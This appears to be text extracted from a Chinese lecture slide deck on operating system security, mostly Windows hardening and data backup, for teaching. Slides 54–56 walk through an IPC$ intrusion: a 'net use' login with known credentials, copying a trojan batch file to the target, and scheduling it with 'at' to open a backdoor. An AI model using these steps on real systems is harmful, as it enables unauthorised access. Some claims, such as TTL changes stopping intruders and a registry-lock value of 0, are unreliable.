操作系统安全技术.pptx

Click to edit Master title style,Click to edit Master text styles,Second level,Third level,Fourth level,Fifth level,*,*,*,*,*,*,return,*,*,*,*,*,*,*,*,return,网络安全技术,第1页,本章作业,思索题,试验要求,操作系统安全办法,安全配置方案初级篇,安全配置方案中、高级篇,数据备份方案,磁盘备份,双机、网络备份,数据备份与恢复策略,数据备份策略,灾难恢复策略,操作系统安全技术,操作系统安全技术概述,各类操作系统安全技术,数据备份概述,产生数据失效主要原因,备份及其相关概念,第,7,章,操作系统安全,与数据备份,技术,网络安全技术,第2页,操作系统安全技术概述,操作系统安全需求,操作系统安全防护普通方法,操作系统资源防护技术,操作系统安全技术,第3页,操作系统安全需求,操作系统安全技术概述,安全策略,标识,判别,责任,确保,连续保护,第4页,操作系统安全需求,操作系统安全技术概述,安全策略,标识,判别,责任,确保,连续保护,对于认证主体和客体，系统必须有一个规则集用于决定一个特定主体是否能够访问一个详细客体,第5页,操作系统安全需求,操作系统安全技术概述,安全策略,标识,判别,责任,确保,连续保护,给客体一个能够有效反应它安全级别标识,第6页,操作系统安全需求,操作系统安全技术概述,安全策略,标识,判别,责任,确保,连续保护,存放信息每一次访问都应受到控制，即只有授权用户才能访问这些信息,第7页,操作系统安全需求,操作系统安全技术概述,安全策略,标识,判别,责任,确保,连续保护,系统要保护审计数据不受破坏，以确保违反安全事件在发生后可被探测出来,第8页,操作系统安全需求,操作系统安全技术概述,安全策略,标识,判别,责任,确保,连续保护,一个计算机系统应该能够含有能够被评定各种软硬件机制，应提供充分确保系统实现上述四种与安全相关需求,第9页,操作系统安全需求,操作系统安全技术概述,安全策略,标识,判别,责任,确保,连续保护,实现这些基本需求可信机制必须能不停地提供保护以预防入侵和未经授权篡改,第10页,操作系统安全防护普通方法,操作系统隔离控制安全办法：隔离、时间隔离、逻辑隔离和加密隔离,操作系统访问控制安全办法：自主访问控制、强制访问控制、基于角色访问控制、域和类型执行访问控制,操作系统安全技术概述,第11页,操作系统资源防护技术,系统登录和用户管理安全：登录控制要严格、要加强系统口令管理和良好用户管理,操作系统安全技术概述,第12页,操作系统资源防护技术,内存管理安全：包括单用户内存保护问题、多道程序保护、标识保护法和分段与分页技术等,文件系统安全：包括分组保护、许可权保护、指定保护等,操作系统安全技术概述,第13页,各类操作系统安全技术,UNIX/Linux,系统安全技术,Windows,系统安全技术,操作系统安全技术概述,第14页,UNIX/Linux,系统安全技术,UNIX/Linux,安全基础,UNIX/Linux,安全机制,UNIX/Linux,安全办法,各类操作系统安全技术,第15页,Windows,系统安全技术,Windows/XP,系统安全基础,Windows/XP,系统安全机制,Windows/XP,系统安全办法,各类操作系统安全技术,第16页,Windows,系统安全技术,Windows,系统安全办法初级篇,Windows,系统安全办法中级篇,Windows,系统安全办法高级编,Windows,操作系统安全办法,第17页,禁用,Guest,账户,在计算机管理用户中将,Guest,账户禁用,任何时候都不允许,Guest,账户登陆系统,为保险起见，最好给,Guest,加一个复杂密码，作为,Guest,帐号密码。而且修改,Guest,帐号属性，设置拒绝远程访问,Windows,系统安全办法初级篇,第18页,禁用,Guest,账户,Windows,系统安全办法初级篇,停顿使用,第19页,禁用,Guest,账户,Windows,系统安全办法初级篇,第20页,限制用户数量,帐户数量不要大于,10,个,去掉全部测试帐户、共享帐号,用户组策略设置对应权限，且经常检验系统帐户,删除已经不使用帐户,Windows,系统安全办法初级篇,第21页,管理员帐号更名,将,Administrator,帐号更名能够有效预防密码被盗用,不要使用,Admin,之类名字，这等于没有改。应尽可能把它伪装成普通用户,Windows,系统安全办法初级篇,第22页,陷阱帐号,创建一个名为“,Administrator”,帐户,将它权限设置成最低,再加上一个超出,10,位超级复杂密码,Windows,系统安全办法初级篇,第23页,陷阱帐号,创建一个名为“,Administrator”,帐户,将它权限设置成最低,再加上一个超出,10,位超级复杂密码,Windows,系统安全办法初级篇,陷阱帐号,第24页,安全密码,好密码：安全期内无法破解出来密码,安全密码：,42,天内无法破解出来密码,密码策略：设置为,42,天必须改密码,Windows,系统安全办法初级篇,第25页,安全密码,Windows,系统安全办法初级篇,第26页,更改默认权限,共享文件权限从“,Everyone”,组改成“授权用户”。“,Everyone”,在,Windows,中意味着任何有权进入你网络用户都能够取得这些共享资料,任何时候不要把共享文件用户设置成“,Everyone”,组。包含打印共享，默认属性就是“,Everyone”,组，一定不要忘了改,Windows,系统安全办法初级篇,第27页,屏幕保护密码,屏幕保护密码是预防内部人员破坏服务器一个屏障,用户所使用计算机最好加上屏幕保护密码,Windows,系统安全办法初级篇,第28页,NTFS,分区,把服务器全部分区都改成,NTFS,格式,。,NTFS,文件系统要比,FAT,、,FAT32,文件系统安全得多,确认分区,进入,DOS,输入命令,:chkntfs,盘符,Windows,系统安全办法初级篇,第29页,NTFS,分区,转换分区,(,将,FNT,分区转换为,NTFS,分区,),进入,DOS,输入命令,:convert,盘符,/fs:ntfs,Windows,系统安全办法初级篇,第30页,操作系统安全策略,利用,Windows,安全配置工具配置安全策略,管理工具,当地安全策略,Windows,系统安全办法中级篇,第31页,关闭无须要端口,Winntsystem32driversetc,services,Windows,系统安全办法中级篇,第32页,开启审核策略,安全审核是,Windows,最基本入侵检测方法。当有些人尝试对系统进行某种方式入侵时，都会被安全审核统计下来,表中所列审核是必须开启，其它能够依据需要增加,Windows,系统安全办法中级篇,第33页,开启审核策略,Windows,系统安全办法中级篇,第34页,开启审核策略,Windows,系统安全办法中级篇,默认下未开启,第35页,开启密码策略,密码对系统安全非常主要。当地安全设置中密码策略在默认情况下均未开启,Windows,系统安全办法中级篇,第36页,开启密码策略,密码对系统安全非常主要。当地安全设置中密码策略在默认情况下均未开启,Windows,系统安全办法中级篇,第37页,开启帐户密码,开启帐户策略可有效预防字典式攻击,Windows,系统安全办法中级篇,第38页,开启帐户密码,开启帐户策略可有效预防字典式攻击,Windows,系统安全办法中级篇,第39页,备份敏感文件,将敏感文件存放在另一文件服务器中,即使服务器硬盘容量都很大，但还是应考虑将一些主要数据存放在另外一个安全服务器中，而且经常备份它们,Windows,系统安全办法中级篇,第40页,不显示上次登录,默认情况下，终端服务接入服务器时，登陆对话框中会显示上次登陆帐户名。当地登陆对话框也是一样,设置方法：管理工具,当地安全策略,当地策略,安全选项,登录屏幕上不显示上次登录用户名,已启用,确定,Windows,系统安全办法中级篇,第41页,不显示上次登录,默认情况下，终端服务接入服务器时，登陆对话框中会显示上次登陆帐户名。当地登陆对话框也是一样,设置方法：管理工具,当地安全策略,当地策略,安全选项,登录屏幕上不显示上次登录用户名,已启用,确定,Windows,系统安全办法中级篇,第42页,不显示上次登录,修改注册表禁止显示上次登录名,在,HKEY_LOCAL_MACHINE,主键下修改子键：,SoftwareMicrosoftWindowsNTCurrentVersionWinlogonDontDisplayLastUserName,，将数值数据改成,1,Windows,系统安全办法中级篇,第43页,不显示上次登录,修改注册表禁止显示上次登录名,Windows,系统安全办法中级篇,第44页,不显示上次登录,修改注册表禁止显示上次登录名,Windows,系统安全办法中级篇,第45页,不显示上次登录,修改注册表禁止显示上次登录名,Windows,系统安全办法中级篇,输入,1,第46页,不显示上次登录,假如在,HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsNTCurrentVersionWinlogon,中无,DontDisplayLastUserName,，则创建一个,并将数值数据置为,1,方法,Windows,系统安全办法中级篇,右击鼠标,新建,字符串,在项中输入对应名,用前面方法修改数值数据为,1,第47页,不显示上次登录,方法,右击鼠标,新建,字符串,在项中输入对应名,用前面方法修改数值数据为,1,Windows,系统安全办法中级篇,第48页,禁止建立空连接,默认情况下，任何用户经过空连接连上服务器，能够枚举出帐号，猜测密码,可经过修改注册表来禁止建立空连接,在,HKEY_LOCAL_MACHINE,主键下修改子键：,SystemCurrentControlSetControlLSARestrictAnonymous,，将键值改成“,1”,Windows,系统安全办法中级篇,第49页,禁止建立空连接,Windows,系统安全办法中级篇,第50页,下载最新补丁,很多网络管理员没有访问安全站点习惯，不及时修被漏洞,不能确保数百万行以上代码,Windows,不出一点安全漏洞,经常访问微软和一些安全站点，下载最新,Service Pack,和漏洞补丁，是保障服务器长久安全唯一方法,可用一些惯用,漏洞扫描软件,！先扫描出漏洞,Windows,系统安全办法中级篇,第51页,关闭默认共享,Windows,安装后，系统会创建一些隐藏共享，能够在,DOS,提醒符下输入命令,Net Share,查看,Windows,系统安全办法高级篇,第52页,知道某主机用户名和密码,使用,IPC$,例：已知,IP,为,202.204.146.45,计算机管理员密码为,zxl,，利用命令,IPC$,应用,C:net use 202.204.146.45ipc$zxl/user:zxl,密码,用户名,第53页,知道某主机用户名和密码,使用,IPC$,IPC$,应用,第54页,建立,IPC$,连接,D:net use 11.14.7.50/user administrator liting,使用,COPY,命令复制一个木马程序,D:copy d:opentelnet.bat 11.14.7.50e$winntsystem32,查看远程时间,D:at time 11.14.7.50e$winntsystem32,怎样利用,IPC$,入侵,第55页,添加计划任务,D:at 11.14.7.50 20:05 opentelnet.bat,等候时间到后门程序自动开启,进入对方主机,怎样利用,IPC$,入侵,第56页,关闭共享,关闭,139,、,445,端口,安装防火墙，设置端口过滤,给计算机主要帐户设置复杂密码（,15,，大小写字母符号）,怎样防范,IPC$,入侵,第57页,关闭默认共享,停顿默认共享方法：管理工具,计算机管理,共享文件夹,共享，在对应共享文件夹上按右键，点停顿共享,Windows,系统安全办法高级篇,第58页,关闭默认共享,第59页,关闭默认共享,第60页,方法二：批处理自开启法,打开记事本，输入以下内容,net share ipc$/delete,net share admin$/delete,net share c$/delete,net share d$/delete,net share e$/delete,关闭默认共享,注意：有几个硬盘分区就写几行这么命令,第61页,方法二：批处理自开启法,保留为,NotShare.bat,（注意后缀！）,把批处理文件拖到“程序”“开启”项中,假如需要开启某个或一些共享，只要将该批处理文件中对应那行命令行删掉即可,关闭默认共享,第62页,方法三：注册表改键值法,保留为,NotShare.bat,（注意后缀！）,把批处理文件拖到“程序”“开启”项中,假如需要开启某个或一些共享，将该批处理文件中对应那行命令行删掉,关闭默认共享,注意：有几个硬盘分区就写几行这么命令,第63页,方法四：停顿服务法,(,最简单方式,),找到“,HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters”,项，双击右侧窗口中“,AutoShareServer”,项将键值由,1,改为,0,，关闭硬盘各分区共享。假如没有,AutoShareServer,项，可自己新建一个再改键值。然后还是在这一窗口下再找到“,AutoShareWks”,项，也把键值由,1,改为,0,，关闭,admin$,共享,关闭默认共享,第64页,方法四：停顿服务法,(,最简单方式,),“,HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa”,项处找到“,restrictanonymous”,，将键值设为,1,，关闭,IPC$,共享,关闭默认共享,注意：此方法必须重启机器，一经改动永远停顿共享,第65页,方法四：停顿服务法,(,最简单方式,),在弹出“常规”标签中把“开启类型”由原来“自动”更改为“已禁用”。然后单击下面“服务状态”“停顿”按钮,确认,关闭默认共享,第66页,关闭默认共享,第67页,关闭默认共享,第68页,关闭默认共享,第69页,关闭默认共享,第70页,关闭默认共享,第71页,关闭默认共享,第72页,139,端口能够经过,NBT,来屏蔽,屏蔽,139,端口,第73页,第74页,第75页,第76页,第77页,第78页,能够经过修改注册表来屏蔽,找到,HKEY_LOCAL_MACHINE,添加一个新键值,SystemControlsetServicesNetBTParameters,屏蔽,445,端口,第79页,添加信息,Key:SystemControlsetServicesNetBTParameters,Name:SMBDeviceEnabled,Type:REG_DWORD,Value:0,修改完后关闭注册表,重新开启,屏蔽,445,端口,第80页,禁用,Dump,文件,在系统瓦解和蓝屏时候，,Dump,文件是一份很有用资料，能够帮助查找问题。然而，也能够给黑客提供一些敏感信息，比如一些应用程序密码等,禁止方法：控制面板,系统,高级,开启和故障恢复，把写入调试信息改成无,Windows,系统安全办法高级篇,第81页,加密,Temp,文件夹,一些应用程序在安装和升级时候，会把一些东西拷贝到,Temp,文件夹，不过当程序升级完成或关闭时候，并不会自己去除,Temp,文件夹内容,给,Temp,文件夹加密能够给你文件多一层保护,Windows,系统安全办法高级篇,第82页,锁住注册表,在,Windows,中，只有,Administrators,和,Backup Operators,才有从网络上访问注册表权限。当帐号密码泄漏以后，黑客也能够在远程访问注册表，当服务器放到网络上时候，普通需要锁定注册表,Windows,系统安全办法高级篇,第83页,锁住注册表,方法：修改,Hkey_current_user,下子键：,SoftwaremicrosoftwindowscurrentversionPoliciessystem,。把,DisableRegistryTools,值改为,0,，类型为,DWORD,Windows,系统安全办法高级篇,第84页,锁住注册表,Windows,系统安全办法高级篇,第85页,禁止判断主机类型,黑客利用,TTL,（,Time-To-Live,，活动时间）值能够判别操作系统类型，经过,Ping,指令能判断目标主机类型,Ping,用处是检测目标主机是否连通,Windows,系统安全办法高级篇,第86页,禁止判断主机类型,许多入侵者首先会,Ping,一下主机，因为攻击某一台计算机需要依据对方操作系统，是,Windows,还是,Unix,。如过,TTL,值为,128,就能够认为你系统为,Windows,Windows,系统安全办法高级篇,第87页,禁止判断主机类型,Windows,系统安全办法高级篇,第88页,禁止判断主机类型,Windows,系统安全办法高级篇,第89页,禁止判断主机类型,修改,TTL,值，入侵者就无法入侵了,比如将操作系统,TTL,值改为,111,，改主键,HKEY_LOCAL_MACHINE,子键：,SYSTEMCURRENT_CONTROLSETSERVICESTCPIPPARAMETERS,Windows,系统安全办法高级篇,第90页,regedit.exe,第91页,第92页,第93页,第94页,第95页,第96页,禁止判断主机类型,设置完成重新开启计算机,用,Ping,指令，发觉,TTL,值已被改成,111,Windows,系统安全办法高级篇,第97页,抵抗,DDos,添加注册表一些键值，能够有效抵抗,DDos,攻击,在键值,HKEY_LOCAL_MACHINESystemCurrentControlSetServicesTcpipParameters,下增加对应键及其说明,Windows,系统安全办法高级篇,第98页,抵抗,DDos,Windows,系统安全办法高级篇,第99页,禁止,Guest,访问日志,在默认安装,Windows NT,和,Windows,中，,Guest,帐号和匿名用户能够查看系统事件日志，可能造成许多主要信息泄漏，修改注册表来禁止,Guest,访问事件日志,禁止,Guest,访问应用日志,Windows,系统安全办法高级篇,第100页,禁止,Guest,访问日志,禁止,Guest,访问应用日志,HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlogApplication,下添加键值名称为：,RestrictGuestAccess,，类型为：,DWORD,，将值设置为,1,Windows,系统安全办法高级篇,第101页,禁止,Guest,访问日志,系统日志,HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlogSystem,下添加键值名称为：,RestrictGuestAccess,，类型为：,DWORD,，将值设置为,1,Windows,系统安全办法高级篇,第102页,禁止,Guest,访问日志,安全日志,HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlogSecurity,下添加键值名称为：,RestrictGuestAccess,，类型为：,DWORD,，将值设置为,1,Windows,系统安全办法高级篇,第103页,数据恢复,当数据被病毒或者入侵者破坏后，能够利用,数据恢复软件,能够找回部分被删除数据，在恢复软件中一个著名软件是,Easy Recovery,。软件功效强大，能够恢复被误删除文件、丢失硬盘分区等等,Windows,系统安全办法高级篇,第104页,数据恢复软件,第105页,数据恢复软件,第106页,数据恢复软件,第107页,数据恢复软件,第108页,数据恢复软件,第109页,数据恢复软件,第110页,数据恢复软件,第111页,数据恢复软件,第112页,操作系统安全与数据备份技术章作业,简述操作系统帐号管理主要性。,有几个方法能够保护密码不被破解或被盗取,?,简述审核策略、密码策略和帐户策略含义，以及这些策略怎样保护操作系统不被入侵？,怎样关闭不需要端和服务？,第113页,操作系统安全与数据备份技术章试验,试验要求,内容及要求参见附件,汇报截止时间：,汇报文件名：,R,学号,-6,第114页,什么是,IPC$,是共享“命名管道”资源，它是为了让进程间能够通信而开放命名管道。能够经过验证用户名和密码取得对应权限，在远程管理计算机和查看计算机共享资源时使用,IPC$,是,Windows,系统中一项功效，在刚才安装完系统之后全部逻辑分区都会被默认共享,第115页,